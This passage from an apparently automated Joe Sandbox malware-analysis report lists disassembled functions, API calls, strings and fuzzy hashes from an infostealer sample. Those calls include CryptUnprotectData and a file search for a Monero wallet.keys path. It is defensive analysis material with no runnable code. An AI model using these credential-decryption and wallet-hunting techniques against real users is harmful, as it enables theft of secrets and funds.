                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: d2106148aed3605fc32a72eee6204c693e396115ec5aeecb11dce7f196b28b8a
                        • Instruction ID: f441e4f015c80c74a088eae0ee69ad25b7fbab3bc0d99c27f3ee18181e525326
                        • Opcode Fuzzy Hash: d2106148aed3605fc32a72eee6204c693e396115ec5aeecb11dce7f196b28b8a
                        • Instruction Fuzzy Hash: 7A1182B1946228EBDB108F54DC59FAAF778F745721F104796E906932C0D7745A40CF91
                        Function 00D6AEB1 Relevance: 6.0, Strings: 4, Instructions: 1009COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !;?$;rsy$<}$<}
                        • API String ID: 0-3169814563
                        • Opcode ID: 0206f116cc30acd1500d91b3431fd48324047ae39eafbb1c602237092faa0f2a
                        • Instruction ID: 818070c5b30998433710d241008a198b5a9cc9b440ce6759e3a6606fbc2a51eb
                        • Opcode Fuzzy Hash: 0206f116cc30acd1500d91b3431fd48324047ae39eafbb1c602237092faa0f2a
                        • Instruction Fuzzy Hash: FC6215F360C6049FE300AE29EC8566AFBE5EF94720F1A893DE6C4C7744EA3558458793
                        Function 00D5EA73 Relevance: 5.4, Strings: 3, Instructions: 1624COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: *Z{$vox$0`
                        • API String ID: 0-691957148
                        • Opcode ID: 552b0a346e67dc2fe220a3fd4e0bf214e361694abdc28032bb5b15d12164cdf5
                        • Instruction ID: d26403a607df818bf85bf75fe6fa308a1f4b769448f7fdb2d012f394f9c6c0a0
                        • Opcode Fuzzy Hash: 552b0a346e67dc2fe220a3fd4e0bf214e361694abdc28032bb5b15d12164cdf5
                        • Instruction Fuzzy Hash: 24B208F3A082149FE704AE2DEC8577AFBE9EF94320F16463DEAC4C7744E63558018696
                        Function 00D5D02B Relevance: 5.3, Strings: 3, Instructions: 1586COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: E$Xjn{$s*:
                        • API String ID: 0-602696667
                        • Opcode ID: 0e85d8eec08c99623e8f42884ff01adc9a785d552f228b17fd2199cc61f50456
                        • Instruction ID: 487e68d8114b8384ec0ebd3248fcbd8d4ca58617496a0b5cc28f225ae02047bb
                        • Opcode Fuzzy Hash: 0e85d8eec08c99623e8f42884ff01adc9a785d552f228b17fd2199cc61f50456
                        • Instruction Fuzzy Hash: 23B2F5F3A0C2109FE3046E2DEC4567AFBE6EF94720F1A492DEAC4C7744EA3558418796
                        Function 009A3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.COMBASE(009AE118,00000000,00000001,009AE108,00000000), ref: 009A3758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009A37B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 7ba39acdad0fa44854f7ebcf60f6519d6c0e127fc8bc4e293812ec518e7922b6
                        • Instruction ID: dddf3bdc723ea99da8eb1effac43c66918823eba2fcfb90cb4e98d12c4acbff5
                        • Opcode Fuzzy Hash: 7ba39acdad0fa44854f7ebcf60f6519d6c0e127fc8bc4e293812ec518e7922b6
                        • Instruction Fuzzy Hash: 2C41E870A40A289FDB24DB58CC95B9BB7B5BB49702F4081D8F609E72D0E7716E85CF90
                        Function 00999B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00999B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00999BA3
                        • LocalFree.KERNEL32(?), ref: 00999BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: bdb904b1a1f63b60b15c9031f7d0e0f7c97e6a29bbd647a64d5233872b783281
                        • Instruction ID: ddc11364df6f657a1fe45dd180e720dbb5fdfc5ae0febc9ae8ae86dbd1bc5c9b
                        • Opcode Fuzzy Hash: bdb904b1a1f63b60b15c9031f7d0e0f7c97e6a29bbd647a64d5233872b783281
                        • Instruction Fuzzy Hash: F6110CB8A00209DFCB04DF98D995AAEB7B9FF88300F104559ED15A7350E775AE10CF61
                        Function 0099F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009B15B8,009B0D96), ref: 0099F71E
                        • StrCmpCA.SHLWAPI(?,009B15BC), ref: 0099F76F
                        • StrCmpCA.SHLWAPI(?,009B15C0), ref: 0099F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0099FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0099FAC3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 07f92438333cf935cdc1c89cb07446efe238d6eb04f9c7de9371248eb7689c75
                        • Instruction ID: c5c8a94f0a9e99ae49bf56da5f102f6821396744954054426e95f25811998b4c
                        • Opcode Fuzzy Hash: 07f92438333cf935cdc1c89cb07446efe238d6eb04f9c7de9371248eb7689c75
                        • Instruction Fuzzy Hash: FE119A3180010D9BDB54FBB4DC65BEE7378AF91310F5046A5A51B57492EF342B4AC7D2
                        Function 00D397F5 Relevance: 1.5, Strings: 1, Instructions: 227COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 3U~
                        • API String ID: 0-1632518667
                        • Opcode ID: c34678af00d239050648641aef99c985add44abfdca4e3ab94def4ca806fd493
                        • Instruction ID: 1dc98645d6e39a08567713054f932c5e3e83cc9c5c4b2e57a1d2d078143abeb8
                        • Opcode Fuzzy Hash: c34678af00d239050648641aef99c985add44abfdca4e3ab94def4ca806fd493
                        • Instruction Fuzzy Hash: 7371E3F3E182149BE308AE2CDC5536ABBE5EB58720F1B463DDAC8D3784E9355D044786
                        Function 00D1C737 Relevance: 1.5, Strings: 1, Instructions: 227COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: my^
                        • API String ID: 0-1435853034
                        • Opcode ID: 7d66e08de2d4ff4a6ddef81b5b3582af8b68d61a84da61d74960e7370fdcefa9
                        • Instruction ID: 2da85d945eae11ae5247062e860aaa018a77feda7aed6a763da58e12be4a5552
                        • Opcode Fuzzy Hash: 7d66e08de2d4ff4a6ddef81b5b3582af8b68d61a84da61d74960e7370fdcefa9
                        • Instruction Fuzzy Hash: 847104F3A082109FE3046E29EC8577AB7E9EF94720F1B453DDAC893780E979580586D6
                        Function 00CF233E Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !!]{
                        • API String ID: 0-3364335677
                        • Opcode ID: 14f8afc0de662d95038410ef6279def8fb76f184806112dba2a3c45ac2b6babd
                        • Instruction ID: 6c18759e9885bd351d29d975c69d324997fc9ae8437a997b49241398cf2e9194
                        • Opcode Fuzzy Hash: 14f8afc0de662d95038410ef6279def8fb76f184806112dba2a3c45ac2b6babd
                        • Instruction Fuzzy Hash: 9E5144F3A186209FD3082E18DC9577AB7E9EFA8720F1B492DEAC597744D6344C018AD6
                        Function 00C412FA Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ow
                        • API String ID: 0-260243922
                        • Opcode ID: 37fea7911a0b02e47110fbec9148d03c333d867b825389042b048e138e01de34
                        • Instruction ID: 027fc8bc2538a82cb583da39cb369a5679523af43c9e9904e6d982b028265552
                        • Opcode Fuzzy Hash: 37fea7911a0b02e47110fbec9148d03c333d867b825389042b048e138e01de34
                        • Instruction Fuzzy Hash: 8C2168F375931D2BE30898B9ECC4727B78ACB44230F298239E751C3BC4ECA9A9044141
                        Function 00C4BEDE Relevance: .2, Instructions: 217COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
